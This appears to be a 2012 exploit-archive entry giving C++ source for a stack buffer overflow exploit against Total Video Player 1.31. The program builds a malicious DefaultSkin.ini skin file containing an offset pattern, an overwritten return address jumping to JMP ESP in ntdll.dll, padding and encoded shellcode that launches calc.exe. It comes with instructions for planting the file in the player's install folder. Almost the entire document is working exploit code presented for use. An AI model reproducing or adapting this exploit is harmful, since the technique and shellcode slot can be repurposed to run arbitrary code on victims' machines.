Total Video Player V1.31 [.flv] vuln after exception handling



EKU-ID: 2298 CVE: OSVDB-ID:
Author: Ayrbyte Published: 2012-06-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*##############################################################################################
title       : Total Video Player V1.31 [.flv] vuln after exception handling
author      : Ayrbyte
link        : http://www.softpedia.com/get/Multimedia/Video/Video-Players/Total-Video-Player.shtml
tested on   : Windows XP sp 2
fb          : fb.me/Ayrbyte
greetz to   : thank's to Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
              Zet Dot Exe and all b-compi family ^_^
              We are B-Compi... We are Hacker... We Are Proud...!
################################################################################################
>>compile this exploit to make file DefaultSkin.ini
>>put file DefaultSkin.ini to [TVP instalation folder]\Skins\DefaultSkin\DefaultSkin.ini   
>>run TVP and you will show calc.exe
##############################################################################################*/
#include <iostream>
using namespace std;

char _isi1[] =
"\x5B\x47\x65\x6E\x65\x72\x61\x6C\x5D\x20\x0D\x0A\x41\x75\x74\x68\x6F\x72\x3A\x20\x41\x79\x72\x62\x79\x74\x65\x0D\x0A\x43\x6F\x6E\x74\x61\x63\x74\x3A\x20\x62\x2D\x63\x6F\x6D\x70\x69\x2E\x6E\x65\x74\x0D\x0A\x0D\x0A\x5B\x57\x69\x6E\x64\x6F\x77\x73\x5D\x0D\x0A\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x74\x76\x70\x2E\x65\x78\x65\x2C\x49\x44\x0D\x0A\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x70\x6C\x73\x2E\x64\x6C\x6C\x2C\x49\x44\x0D\x0A\x41\x62\x6F\x75\x74\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x74\x76\x70\x2E\x65\x78\x65\x2C\x49\x44\x0D\x0A\x56\x43\x74\x72\x6C\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x74\x76\x70\x2E\x65\x78\x65\x2C\x49\x44\x0D\x0A\x0D\x0A\x5B\x48\x6F\x6F\x6B\x46\x69\x6C\x74\x65\x72\x5D\x0D\x0A\x4E\x6F\x74\x48\x6F\x6F\x6B\x20\x3D\x20\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x2C\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x0D\x0A\x0D\x0A\x5B\x48\x6F\x6F\x6B\x53\x70\x65\x63\x69\x61\x6C\x5D\x0D\x0A\x53\x70\x65\x63\x69\x61\x6C\x20\x3D\x20\x41\x62\x6F\x75\x74\x57\x69\x6E\x64\x6F\x77\x0D\x0A\x0D\x0A\x5B\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x53\x43\x52\x45\x45\x4E\x5D\x0D\x0A\x4D\x61\x73\x6B\x3D\x4D\x61\x73\x6B\x2E\x62\x6D\x70\x0D\x0A\x4D\x61\x69\x6E\x3D\x4E\x6F\x72\x6D\x61\x6C\x2E\x62\x6D\x70\x0D\x0A\x44\x6F\x77\x6E\x3D\x64\x6F\x77\x6E\x2E\x62\x6D\x70\x0D\x0A\x4F\x76\x65\x72\x3D\x6F\x76\x65\x72\x2E\x62\x6D\x70\x0D\x0A\x44\x69\x73\x61\x62\x6C\x65\x64\x3D\x64\x69\x73\x61\x62\x6C\x65\x2E\x62\x6D\x70\x0D\x0A\x52\x65\x53\x69\x7A\x65\x3D\x46\x41\x4C\x53\x45\x0D\x0A\x0D\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x53\x43\x52\x45\x45\x4E\x5D\x0D\x0A\x4D\x61\x69\x6E\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4E\x6F\x72\x6D\x61\x6C\x2E\x62\x6D\x70\x0D\x0A\x44\x6F\x77\x6E\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x44\x6F\x77\x6E\x2E\x62\x6D\x70\x0D\x0A\x4F\x76\x65\x72\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4F\x76\x65\x72\x2E\x62\x6D\x70\x0D\x0A\x44\x69\x73\x61\x62\x6C\x65\x64\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4E\x6F\x72\x6D\x61\x6C\x2E\x62\x6D\x70\x0D\x0A\x52\x65\x53\x69\x7A\x65\x3D\x54\x52\x55\x45\x0D\x0A\x0D\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x4D\x45\x4E\x55\x5D\x0D\x0A\x42\x6B\x50\x69\x63\x4E\x61\x6D\x65\x3D\x4D\x65\x6E\x75\x2E\x62\x6D\x70\x0D\x0A\x46\x6F\x6E\x74\x4E\x61\x6D\x65\x3D\x4D\x53\x20\x53\x61\x6E\x73\x20\x53\x65\x72\x69\x66\x0D\x0A\x0D\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x4C\x49\x53\x54\x43\x54\x52\x4C\x53\x54\x59\x4C\x45\x5D\x0D\x0A\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x3D\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x2E\x62\x6D\x70\x0D\x0A\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x45\x6E\x64\x3D\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x45\x6E\x64\x2E\x62\x6D\x70\x0D\x0A\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x74\x61\x72\x74\x3D";
char _A[] =
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6";
char _EIP[] = "\xED\x1E\x94\x7c";
char _B[]=
"BBBBBBBBBBBBђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ";
char _playload[] =
"\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83";
char _akhir[] = "B"; //nilai sampah untuk melengkapi input agar tetap 1000
char _isi2[] = //isi penutup
"\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x2E\x62\x6D\x70";

int main(){
    FILE *_file;
    #define _namefile "DefaultSkin.ini"
    _file = fopen(_namefile, "w");
    fputs(_isi1, _file); //isi pembuka
    fputs(_A, _file); //input sebelum EIP
    fputs(_EIP, _file); // EIP beralamat 7C941EED  JMP ESP dari ntdll.dll
    fputs(_B, _file); //input untuk nop (No Operation) sebelum playload
    fputs(_playload, _file); //playload untuk menjalankan calc.exe
    //di sini nelai EIP tergantung oleh jumlah input
    //jumlah input yang kurang dari 1000 sisanya di tambah dengan
    //nilai sampah "B", agar EIP nya bernilai tetap
    for (int i=0; i < 1000 - (strlen(_A) + strlen(_EIP) + strlen(_B) + strlen(_playload));i++)
    {fputs(_akhir, _file);}
    fputs(_isi2, _file);
    fclose(_file);
    return 0;   
}